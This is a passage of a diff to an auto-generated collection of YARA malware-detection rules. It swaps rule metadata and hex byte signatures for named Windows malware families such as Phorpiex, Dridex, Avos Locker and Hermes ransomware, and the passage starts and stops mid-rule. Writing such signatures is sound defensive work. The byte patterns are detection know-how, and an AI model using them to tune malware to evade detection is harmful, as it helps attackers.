7 of them and filesize <339968 } -rule MALPEDIA_Win_Bitsran_Auto : FILE +rule MALPEDIA_Win_Redshawl_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "e3cfbc68-7ec2-5ca7-89d3-b794638917c8" + id = "6da43ccb-6114-536f-a2d4-a0a197b8eb4b" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bitsran" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.bitsran_auto.yar#L1-L119" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.redshawl" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.redshawl_auto.yar#L1-L120" license_url = "N/A" - logic_hash = "2919e184e2a9722abe679cf353ecc217eb2b7fdd010f4e63772073cd0ac5e798" + logic_hash = "b081202974eb2cc07597ec5bbbc48f26672d398acc6550f420b42ca3feedcaae" score = 75 quality = 75 tags = "FILE" @@ -147741,32 +150640,32 @@ rule MALPEDIA_Win_Bitsran_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 85c0 7433 56 57 8bbdf8bfffff c1ef02 } - $sequence_1 = { 8911 8b0d???????? 8b9d58fdffff eb5e 8b35???????? } - $sequence_2 = { 85f6 7417 8b4508 50 } - $sequence_3 = { 50 53 e8???????? 8b9d44fdffff 83ef04 } - $sequence_4 = { 83c408 85c0 7403 8975fc 8b03 8d55b8 52 } - $sequence_5 = { 742b 8bc1 2bc1 c1f802 8d348500000000 } - $sequence_6 = { 8b04c5046f4100 5d c3 8bff } - $sequence_7 = { 8d95d4fbffff 52 53 ff15???????? 837d1401 7407 } - $sequence_8 = { 2bc3 c1f802 3dfeffff3f 0f87d0010000 8bca 2bcb } - $sequence_9 = { 899d58fdffff 3bd9 0f83fe000000 3bd3 0f87f6000000 8b35???????? 2bda } + $sequence_0 = { ffc6 488d0c80 488d05baaa0000 488d0cc8 48890f ff15???????? 85c0 } + $sequence_1 = { e8???????? 488b8b58010000 e8???????? 488d7b58 be06000000 488d0519c30000 483947f0 } + $sequence_2 = { 488bce 488bc6 488d15709a0000 83e11f } + $sequence_3 = { 488b8b58010000 e8???????? 488d7b58 be06000000 488d0519c30000 } + $sequence_4 = { e9???????? 4c8d2552940000 488b0d???????? eb7c } + $sequence_5 = { eb76 33c9 488d1543bb0000 48891401 4883c230 4883c108 48ffcb } + $sequence_6 = { 8905???????? 8b430c 8905???????? 8bd7 4c8d0520d1ffff 89542420 } + $sequence_7 = { 8bd8 488bcf ff15???????? 488b742438 8bc3 } + $sequence_8 = { 72ed 48833d????????00 741f 488d0dc2c10000 e8???????? 85c0 } + $sequence_9 = { 4c8d251ac70000 4863f8 49833cfc00 752b b900100000 } condition: - 7 of them and filesize <344064 + 7 of them and filesize <174080 } -rule MALPEDIA_Win_Salgorea_Auto : FILE +rule MALPEDIA_Win_Zhcat_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "485be719-ad86-58c5-b98c-1fa9d3a194c2" + id = "0ba2d083-15f8-52b3-8a0e-523b48182ccb" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.salgorea" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.salgorea_auto.yar#L1-L163" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.zhcat" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.zhcat_auto.yar#L1-L123" license_url = "N/A" - logic_hash = "a8561e214f866675e949632f523697275b0bd60d695b553a0e222be68943af7d" + logic_hash = "42a0cd82873743b61553ad212467ec7353604cc191810d2e10195e3fc58baf2d" score = 75 quality = 75 tags = "FILE" @@ -147780,40 +150679,34 @@ rule MALPEDIA_Win_Salgorea_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8b5c240c 53 9d 8b5c2404 } - $sequence_1 = { 51 66b9b469 66f7f1 f7da } - $sequence_2 = { 51 6698 f7db 33d2 b889510000 b98c0b0000 } - $sequence_3 = { 66c1e303 f6d1 f8 6633d2 66b8b96a 66b9ada1 66f7f1 } - $sequence_4 = { 66c1e306 80eb38 80e6ee f8 f6d1 52 40 } - $sequence_5 = { 8b5c2404 f8 99 8b1424 f5 66f7d8 8b442410 } - $sequence_6 = { 66c1e804 8b44240c 0fbafa00 0fbcd2 } - $sequence_7 = { 8b5c240c 53 d50a 48 d40a 22c9 } - $sequence_8 = { a1???????? 8945cc 8d45cc 3930 } - $sequence_9 = { 8d87d8010000 50 8d83d8010000 50 } - $sequence_10 = { 8d8850040000 8d984c040000 8b4510 8b00 } - $sequence_11 = { 8d885c040000 8d9858040000 e9???????? 8b7508 } - $sequence_12 = { 8d87d8010000 50 e8???????? 59 59 85c0 } - $sequence_13 = { 8d87d8010000 50 8d83b0020000 50 e8???????? 59 } - $sequence_14 = { 8d8860010000 0fb701 a801 740a } - $sequence_15 = { 8d8840010000 8d9044010000 56 8b750c } + $sequence_0 = { 8b3d???????? 8b7508 4f 8945fc } + $sequence_1 = { 741e 8d45f8 8975f8 50 85ff 750a } + $sequence_2 = { 85c9 759e 56 e8???????? 59 } + $sequence_3 = { 85c9 759e 56 e8???????? 59 5f 5e } + $sequence_4 = { 3c74 7404 3c54 7512 8915???????? eb0a } + $sequence_5 = { 68???????? 56 56 897004 ffd3 6aff } + $sequence_6 = { ff7508 ff15???????? ff7514 8945e4 8bc7 668945f0 ffd6 } + $sequence_7 = { eb28 c705????????02000000 eb1c c605????????01 } + $sequence_8 = { 0fb63e 0fb6c0 eb12 8b45e0 8a80044a4100 08443b1d 0fb64601 } + $sequence_9 = { ff7508 ff15???????? 57 8bf0 e8???????? 59 5f } condition: - 7 of them and filesize <2007040 + 7 of them and filesize <376832 } -rule MALPEDIA_Win_Snifula_Auto : FILE +rule MALPEDIA_Win_Phorpiex_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "3dffa8bc-fef5-5d9b-860e-b2ad6113d3e0" + id = "eb226bf1-84a3-5e5c-8655-1f02f1d972a0" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.snifula" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.snifula_auto.yar#L1-L128" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.phorpiex" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.phorpiex_auto.yar#L1-L284" license_url = "N/A" - logic_hash = "5394c0842b5f05f382e3a7b0318fd2397f5c79fe7938989019ff20c4e8348941" + logic_hash = "626e70970105507345b3f584dcd1a33bae9d4d1c587f31ce85f081908c2a5392" score = 75 - quality = 75 + quality = 73 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -147825,32 +150718,52 @@ rule MALPEDIA_Win_Snifula_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 53 ff35???????? ffd7 6800040000 53 ff35???????? } - $sequence_1 = { 53 6a00 ff35???????? ff15???????? b8???????? 83c9ff } - $sequence_2 = { 6a00 ff35???????? 8945fc ff15???????? 8bf8 85ff } - $sequence_3 = { a1???????? 85c0 75ef 53 57 bb???????? } - $sequence_4 = { ff15???????? 8bf8 83ffff 747f 53 8d450c 50 } - $sequence_5 = { e8???????? 85c0 740c 81386368756e 7504 834e1002 8bc6 } - $sequence_6 = { c1e802 25ff000000 8d44c72c 8b18 3bd8 7432 } - $sequence_7 = { 83f803 7533 ff7304 8bc7 ff750c e8???????? 8b4724 } - $sequence_8 = { 68???????? 56 ff15???????? 83c414 68???????? 56 } - $sequence_9 = { 53 50 889c243c010000 e8???????? a1???????? 83c43c 895c2430 } + $sequence_0 = { 6a00 ff15???????? ff15???????? 50 e8???????? } + $sequence_1 = { ff15???????? 85c0 740f 6a07 } + $sequence_2 = { ff15???????? 85c0 741f 6880000000 } + $sequence_3 = { 6a20 6a00 6a00 6a00 8b5508 52 6a00 } + $sequence_4 = { e8???????? 83c410 6a00 6a02 6a02 6a00 6a00 } + $sequence_5 = { 6a01 6a00 68???????? e8???????? 83c40c 33c0 } + $sequence_6 = { e8???????? 99 b90d000000 f7f9 } + $sequence_7 = { 52 ff15???????? 6a00 6a00 6a00 6a00 68???????? } + $sequence_8 = { 50 e8???????? 83c404 e8???????? e8???????? ff15???????? } + $sequence_9 = { 68???????? ff15???????? 8d85f8fdffff 50 68???????? } + $sequence_10 = { 6a00 ff15???????? 85c0 7418 ff15???????? } + $sequence_11 = { 6a01 ff15???????? ff15???????? b001 } + $sequence_12 = { 6a00 682a800000 6a00 ff15???????? } + $sequence_13 = { 52 683f000f00 6a00 68???????? 6802000080 ff15???????? 85c0 } + $sequence_14 = { 68???????? ff15???????? e9???????? 8d45fc } + $sequence_15 = { 50 ff15???????? 8945fc 837dfc00 7416 8b4df8 } + $sequence_16 = { f7f9 81c210270000 52 e8???????? } + $sequence_17 = { e8???????? 99 b930750000 f7f9 81c210270000 } + $sequence_18 = { 50 e8???????? 59 59 85c0 7573 } + $sequence_19 = { 3d00010000 7504 83c8ff c3 8b542404 } + $sequence_20 = { 7508 6a00 ff15???????? 6804010000 } + $sequence_21 = { 6a21 50 e8???????? c60000 } + $sequence_22 = { e8???????? 83c41c 6880000000 8d4c240c 51 ff15???????? 6a00 } + $sequence_23 = { 52 e8???????? 99 b960ea0000 f7f9 } + $sequence_24 = { 6880000000 8d8424b4000000 50 6a0c 8d4c2420 51 6800142d00 } + $sequence_25 = { 83790c00 7419 83791800 7418 83c130 83c004 81f9???????? } + $sequence_26 = { 72f7 53 33c0 56 57 663bc2 } + $sequence_27 = { 56 57 68e8030000 ff15???????? e8???????? be???????? } + $sequence_28 = { 50 8d45ec 50 6805000020 } + $sequence_29 = { 8d45f8 50 8d45e4 50 6805000020 } condition: - 7 of them and filesize <188416 + 7 of them and filesize <2490368 } -rule MALPEDIA_Win_Stabuniq_Auto : FILE +rule MALPEDIA_Win_Agfspy_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "fc58cf81-e26c-5be2-91a6-3fbb3fc72d52" + id = "aa314a06-4040-546e-b9cd-d5bfa676b734" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.stabuniq" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.stabuniq_auto.yar#L1-L126" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.agfspy" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.agfspy_auto.yar#L1-L132" license_url = "N/A" - logic_hash = "97aa7344abd98ffc46d944f3c78f102b277bbba8d700aca31756ce2df1f26cfc" + logic_hash = "e751bb17a85204a5afd3cbca773cdafd25186332344d59ffe01d62696a3fda9d" score = 75 quality = 75 tags = "FILE" @@ -147864,32 +150777,32 @@ rule MALPEDIA_Win_Stabuniq_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 50 8b4d08 ff91a8000000 6a00 6a00 } - $sequence_1 = { 8b8df4feffff 51 6aff 8b5508 81c2a2050000 } - $sequence_2 = { 52 8b4510 ff503c 8b4d10 33d2 668b9106020000 } - $sequence_3 = { 6a00 8b4d08 8b91f8010000 52 8b4508 ff9018010000 837de4ff } - $sequence_4 = { 8985c8fbffff 8b4d14 51 6a08 8b550c } - $sequence_5 = { 8b4df8 8b11 035508 8955f4 eb0c 8b45f8 8b4810 } - $sequence_6 = { 51 e8???????? 8b5508 83c220 895508 c785bcfcffff00000000 8b4510 } - $sequence_7 = { 51 8b550c ff524c 8945fc 8b45fc 50 } - $sequence_8 = { 8d85c0fcffff 50 8b4d0c 51 e8???????? eb16 8b5510 } - $sequence_9 = { 81c155030000 51 e8???????? 6a00 8b5514 52 8b85e8feffff } + $sequence_0 = { 7527 83fefd 7431 8a4101 3a4201 751a 83fefe } + $sequence_1 = { 85f6 7539 8d45c0 50 8d45d4 50 e8???????? } + $sequence_2 = { 731d 8d4101 83fe10 8945d0 8d45c0 0f4345c0 881408 } + $sequence_3 = { c645fc04 8d45b0 837dc408 51 0f4345b0 8d4d84 50 } + $sequence_4 = { e8???????? eb46 8b4720 85c0 741f 837e1410 8bce } + $sequence_5 = { 2bc1 83c0fc 83f81f 7724 e9???????? 32c0 8b4df4 } + $sequence_6 = { 837de808 0f4375d4 3b55cc 752f 85d2 7413 2bf0 } + $sequence_7 = { 50 e8???????? 8ac8 8b45b4 83f80c 74e7 } + $sequence_8 = { 0fb602 eb05 8b01 ff501c 83f8ff 742f 8b0e } + $sequence_9 = { d1f8 51 8bcb 8d0442 50 52 } condition: - 7 of them and filesize <57344 + 7 of them and filesize <1482752 } -rule MALPEDIA_Win_Miniblindingcan_Auto : FILE +rule MALPEDIA_Win_Leash_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "92bc3e0e-6544-5def-8326-ac0c583fd403" + id = "cb5c9738-3925-5a03-a07d-f456311bbe1c" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.miniblindingcan" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.miniblindingcan_auto.yar#L1-L129" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.leash" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.leash_auto.yar#L1-L123" license_url = "N/A" - logic_hash = "7b8607880b97335be49c71c4d350efefeb788c1420c4ead3bd8ed006de1090db" + logic_hash = "ba62c5a8d74be4d262e44012cbb9d0d01e64bb5749bfbb2b1403f379db7c0758" score = 75 quality = 75 tags = "FILE" @@ -147903,32 +150816,32 @@ rule MALPEDIA_Win_Miniblindingcan_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 899424b0000000 81faff000000 7c37 b881808080 488bce f7e2 c1ea07 } - $sequence_1 = { 8bc6 45338c8c600a0200 c1e808 c1eb08 41c1ea10 0fb6c8 410fb6c0 } - $sequence_2 = { 48ffc1 49ffc8 75ed 488b542428 4c8d442420 488bce e8???????? } - $sequence_3 = { 660f6e7310 488d4c2438 f30fe6f6 ff15???????? 488d542430 488d4c2438 ff15???????? } - $sequence_4 = { 483b442420 0f8710040000 4883fd0f 0f82e7030000 488d7df1 c606f0 } - $sequence_5 = { 488d0579340000 488905???????? e9???????? 81fb39380000 7513 488d0553340000 488905???????? } - $sequence_6 = { 48ffc6 448bc1 f7e1 c1ea07 4c89442430 8bc2 } - $sequence_7 = { 488bc8 ff15???????? 488d1528a70000 488bce 488905???????? ff15???????? 488bc8 } - $sequence_8 = { 488b4590 83a0c8000000fd 83c8ff e9???????? 4183cfff f6431840 4c8d0dc50dffff } - $sequence_9 = { 740a b801000000 e9???????? 4533c9 } + $sequence_0 = { e8???????? 83c408 85c0 7511 8b8b08080000 56 e8???????? } + $sequence_1 = { 8a45ef 885def 3ac3 7404 c645ef01 } + $sequence_2 = { 6a01 6a02 ff15???????? 83f8ff 89831c180000 7519 5f } + $sequence_3 = { 33c0 f2ae f7d1 49 51 e8???????? 8be8 } + $sequence_4 = { 2bf9 8d93fe030000 8bc1 8bf7 8bfa 52 } + $sequence_5 = { 8b5808 33c0 8a442413 33fb 33db } + $sequence_6 = { 8bc1 8bf7 8bfa 8d9510ffffff } + $sequence_7 = { 85ff c744242800000000 7e58 8bd8 895c2410 } + $sequence_8 = { 8bd1 8bf0 c1e902 f3a5 8bca 83c404 83e103 } + $sequence_9 = { 894518 8b4514 99 83e203 03c2 8b5518 } condition: - 7 of them and filesize <453632 + 7 of them and filesize <761856 } -rule MALPEDIA_Win_Fancyfilter_Auto : FILE +rule MALPEDIA_Win_Sobig_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "80aed11c-235c-5a1c-926a-79da2aeef3b0" + id = "7eece2fa-1a04-5dd6-834d-8f7a893bf841" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.fancyfilter" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.fancyfilter_auto.yar#L1-L112" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sobig" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.sobig_auto.yar#L1-L128" license_url = "N/A" - logic_hash = "3c31ea55e7982b34390b9c81f5913450958243c449d75663ce6d5f15ca3bbd38" + logic_hash = "0a10ba676706f70e2749591376b958283b48eb8278fdd736f5378429d6ec57e3" score = 75 quality = 75 tags = "FILE" @@ -147942,32 +150855,32 @@ rule MALPEDIA_Win_Fancyfilter_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 740a 66833800 7404 b001 eb02 } - $sequence_1 = { a1???????? 83c012 50 ff15???????? } - $sequence_2 = { 8b07 83e810 50 83c610 56 } - $sequence_3 = { ff15???????? 83c420 83f803 7409 83f806 } - $sequence_4 = { 83c012 50 ffd6 a1???????? } - $sequence_5 = { 85c0 750d 8b472c a801 7406 83c804 } - $sequence_6 = { 85c0 740a 66833800 7404 b001 eb02 } - $sequence_7 = { 81e3ffffff00 ff15???????? 50 ff15???????? } - $sequence_8 = { 85c0 740a 66833800 7404 b001 } - $sequence_9 = { b805400080 c20400 56 8b742408 } + $sequence_0 = { 50 e8???????? ff35???????? 8d45dc 8bcf 6a00 50 } + $sequence_1 = { 53 50 ff75ec ff75d8 ff75dc ff15???????? 85c0 } + $sequence_2 = { 8a450f 33db 8d7e34 53 8bcf } + $sequence_3 = { 5f 5e c20400 53 56 ff742410 8bf1 } + $sequence_4 = { e8???????? dd4598 8b4de8 dd5db0 dd45a0 dd5db8 dd45a8 } + $sequence_5 = { 8d45b4 50 56 56 68???????? 56 56 } + $sequence_6 = { 8d4db0 e8???????? 8a45b0 83ec10 8bfc 8965e0 53 } + $sequence_7 = { 8b4d08 68???????? e8???????? 6a01 58 8945ec e9???????? } + $sequence_8 = { ff35???????? 8d45dc 8bcf 53 } + $sequence_9 = { ff7508 ff15???????? 85c0 7c43 ff7510 ff15???????? } condition: - 7 of them and filesize <169984 + 7 of them and filesize <262144 } -rule MALPEDIA_Win_Avast_Disabler_Auto : FILE +rule MALPEDIA_Win_Lambert_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "6a09cca4-7cb6-5c97-b15b-4f7311a6621b" + id = "1c692e32-84a7-5d90-ba02-61a84edfcff0" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.avast_disabler" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.avast_disabler_auto.yar#L1-L124" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lambert" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.lambert_auto.yar#L1-L166" license_url = "N/A" - logic_hash = "19754a7bc503b1b28bdfc059b6eb230f6f3e29b2e990d8ace51bd954a83ec439" + logic_hash = "9e5ed22ba49a751e07cf4ea652d26902b7b8b831105840a55340dbe6f75e09b9" score = 75 quality = 75 tags = "FILE" @@ -147981,32 +150894,38 @@ rule MALPEDIA_Win_Avast_Disabler_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 85c0 7404 3bc1 7515 0f31 35???????? } - $sequence_1 = { 7534 837c371400 752d 89443714 6a08 8d45f4 50 } - $sequence_2 = { b94ee640bb 85c0 7404 3bc1 7515 } - $sequence_3 = { 2b4c3718 51 53 53 50 e8???????? 8b4dfc } - $sequence_4 = { 50 ff15???????? 6a01 8d45f8 50 ff750c ff15???????? } - $sequence_5 = { 33c0 40 394510 7534 837c371400 752d } - $sequence_6 = { 8b5c3718 83c112 03d9 837d1000 } - $sequence_7 = { 75a9 5f 5e 5b 5d c21000 55 } - $sequence_8 = { 51 803d????????00 7520 c605????????01 } - $sequence_9 = { 5f 5e 5b 8be5 5d c20c00 3b0d???????? } + $sequence_0 = { 33f2 8b55e8 33ce 33d1 } + $sequence_1 = { 4e 8b1f 8919 2bf0 } + $sequence_2 = { 3bd8 0f826f010000 8a07 8801 41 47 } + $sequence_3 = { 3bd8 0f82a4000000 83fe06 0f822cffffff } + $sequence_4 = { 55 8bec 56 8b7510 c1fe04 } + $sequence_5 = { 2bc1 3bc7 0f82e5010000 8b4508 2bc2 8d7701 } + $sequence_6 = { 33f1 8b4de4 33ce 314de8 } + $sequence_7 = { 3b7d10 724d 3bf9 7349 8bc3 2bc1 } + $sequence_8 = { 6a00 e8???????? 8945fc 8b45fc 8945f4 8b4df4 8b55f4 } + $sequence_9 = { 50 e8???????? 8945e8 8b4de8 3b4d10 750f } + $sequence_10 = { 83ec18 8b450c 8b4814 894df0 8b550c 8b4508 } + $sequence_11 = { 741f 8b4df8 c1e90d 8b55f8 } + $sequence_12 = { ebce 8b45f8 8be5 5d c20400 55 8bec } + $sequence_13 = { 8b510c 8b421c 8945f4 8b4df4 894df0 } + $sequence_14 = { 3b5118 7334 8b45fc 8b4dec } + $sequence_15 = { e8???????? 8945f8 8b4df8 3b4d08 7508 8b55f4 } condition: - 7 of them and filesize <41984 + 7 of them and filesize <1212416 } -rule MALPEDIA_Win_Neddnloader_Auto : FILE +rule MALPEDIA_Win_Ragnarok_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "8eecbeb9-33c7-5f00-852d-691f303c8b89" + id = "a9bce1d7-5883-5de4-9b9b-a02072e8d068" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.neddnloader" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.neddnloader_auto.yar#L1-L169" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ragnarok" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.ragnarok_auto.yar#L1-L132" license_url = "N/A" - logic_hash = "318d1d367a3335dce76e46790f71f42f9c5ddb3e28ec2c109117f64c52aadcd2" + logic_hash = "4922b92876243cdefed80b6c256ba49e22b0c6eaa1ad052381af99f572200bea" score = 75 quality = 75 tags = "FILE" @@ -148020,235 +150939,110 @@ rule MALPEDIA_Win_Neddnloader_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 83c204 3bcf 72f0 8d43ff } - $sequence_1 = { 69c0b179379e c1e813 03c9 0fb73411 } - $sequence_2 = { 8b5508 69c0b179379e c1e813 33c9 66890c42 } - $sequence_3 = { 8d43ff 3bc8 7311 0fb702 } - $sequence_4 = { 8bc1 2b45fc 5f 5e } - $sequence_5 = { eb02 0008 8b45f8 83c0f4 897dfc } - $sequence_6 = { 663bc6 7506 83c102 83c202 3bcb 7307 } - $sequence_7 = { 7311 0fb702 0fb731 663bc6 7506 83c102 } - $sequence_8 = { 488bf2 41c1ed04 492bf0 41ffc5 488bd3 488bcf } - $sequence_9 = { 410fb6c0 4133b48e803c0100 4133b48680480100 418bc0 41337530 c1e808 0fb6d0 } - $sequence_10 = { 0fb6c8 410fb6c0 4133bc8e803c0100 4133bc8680480100 41337d60 418bc0 } - $sequence_11 = { 448bce 448bc7 488bd0 498bce e8???????? 448bf0 } - $sequence_12 = { 488d3d24570000 eb0e 488b03 4885c0 7402 } - $sequence_13 = { 0fb6d0 418bc6 458b949480440100 c1e810 0fb6c8 8bc5 } - $sequence_14 = { 488d0d14100100 baa00f0000 488bc5 83e51f 48c1f805 486bed58 } - $sequence_15 = { ff5348 b97f000000 ff15???????? eb1e 488b5350 498bcd ff5348 } + $sequence_0 = { c1f906 57 6bf838 894df4 8b048d28754300 8b540718 8955ec } + $sequence_1 = { 884219 0fb6461a 88421a 0fb6461b 88421b 0fb6461c 88421c } + $sequence_2 = { c1e908 0fb6c9 c1e308 c1ea10 0fb689105c4300 33d9 8b4dfc } + $sequence_3 = { 8bc8 2345a4 f7d1 234d9c 0bc8 c145980a } + $sequence_4 = { 0fb689104b4300 33d9 0fb6487e c1e308 0fb689104b4300 33d9 0fb6487d } + $sequence_5 = { 8b7d08 0fb6ca 333c8d105d4300 8bcf 897d08 334814 894d08 } + $sequence_6 = { 8b75dc 33f9 037dfc 81c64efd53a9 037d98 c1c209 } + $sequence_7 = { c1c205 8b7dac 0bc8 034dd8 81c7dcbc1b8f 0355bc 03f9 } + $sequence_8 = { 8b048528754300 c644032a0a 8b5d08 747f 8b45f8 8b5df0 8b048528754300 } + $sequence_9 = { 8bf8 89bdb8feffff ff36 68???????? ff35???????? e8???????? 8b4810 } condition: - 7 of them and filesize <3438592 + 7 of them and filesize <483328 } -rule MALPEDIA_Win_Avos_Locker_Auto : FILE +rule MALPEDIA_Win_Hermes_Ransom_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "7ba0a3b7-52b3-54b0-beef-ae9816fdb70a" - date = "2023-12-06" - modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.avos_locker" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.avos_locker_auto.yar#L1-L134" + id = "88136c82-87ab-5f89-8963-9afb9534a540" + date = "2021-10-07" + modified = "2021-10-08" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.hermes_ransom" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.hermes_ransom_auto.yar#L1-L125" license_url = "N/A" - logic_hash = "20760e04f44624b7366badbec4c361401e8cc12f236ee2efc4fb15277f942fc5" + logic_hash = "2bb9637b7e3ee9fcdd4e957eade001e8c8132e1b7c987ea6727ab44eda025915" score = 75 quality = 75 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" signator_config = "callsandjumps;datarefs;binvalue" - malpedia_rule_date = "20231130" - malpedia_hash = "fc8a0e9f343f6d6ded9e7df1a64dac0cc68d7351" - malpedia_version = "20230808" + malpedia_rule_date = "20211007" + malpedia_hash = "e5b790e0f888f252d49063a1251ca60ec2832535" + malpedia_version = "20211008" malpedia_license = "CC BY-SA 4.0" malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8d85a8f9ffff 50 8d85fcf5ffff 50 8d8514f6ffff 50 83ec18 } - $sequence_1 = { 8b4024 ffd0 c645fc0a c78598f9ffff00000000 c7859cf9ffff00000000 8b08 898d98f9ffff } - $sequence_2 = { 59 3b4580 7359 807d8600 8a8848ef4900 8b857cffffff 8808 } - $sequence_3 = { 8d8d05efffff e8???????? 8a8d23f0ffff 8808 46 ebbd 6a22 } - $sequence_4 = { 53 50 e8???????? 83c408 c745fcffffffff 57 8b45d8 } - $sequence_5 = { 8bd3 3ac1 7501 46 42 8a02 84c0 } - $sequence_6 = { c745e800000000 660fd645e4 837de810 8945d4 8b75cc 0f43d0 8b45d0 } - $sequence_7 = { 33c5 50 8d45f4 64a300000000 8b4d0c 8b4508 81f900100000 } - $sequence_8 = { 8a42ff 84c0 75eb 81fe59ee4ef8 740b 8b7118 85ff } - $sequence_9 = { 89958cecffff c645fc35 8bca 8d7102 668b01 83c102 6685c0 } + $sequence_0 = { 59 59 8945e0 837ddc00 7506 837de000 7405 } + $sequence_1 = { 8d45dc 50 ff75d8 8d8560ffffff 50 ff75e0 ff15???????? } + $sequence_2 = { 33c0 668945e2 33c0 8945e4 8945e8 837df020 } + $sequence_3 = { 6a00 8d85a4f9ffff 50 ff15???????? 5f 5e 8be5 } + $sequence_4 = { 0fb7844504f7ffff 83f83b 741f 8b45d8 8b4df0 668b8c4d04f7ffff } + $sequence_5 = { 8365c800 8365d000 c745b840420f00 8365e000 eb07 8b45e0 40 } + $sequence_6 = { 59 6bc900 668981e8c34000 6a02 } + $sequence_7 = { 59 59 6a0f 6a00 8d45bc 50 } + $sequence_8 = { 8365f000 8b45f0 8945f8 837df800 7456 } + $sequence_9 = { 83e002 7415 ff750c ff75fc e8???????? 59 } condition: - 7 of them and filesize <1701888 + 7 of them and filesize <7192576 } -rule MALPEDIA_Win_Dridex_Auto : FILE +rule MALPEDIA_Win_Unidentified_063_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "fd4d4346-8d83-5613-888d-88569f1753b9" - date = "2023-12-06" - modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dridex" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.dridex_auto.yar#L1-L1066" + id = "d22cba4e-b95b-5578-ac95-09534bd7dc14" + date = "2022-11-21" + modified 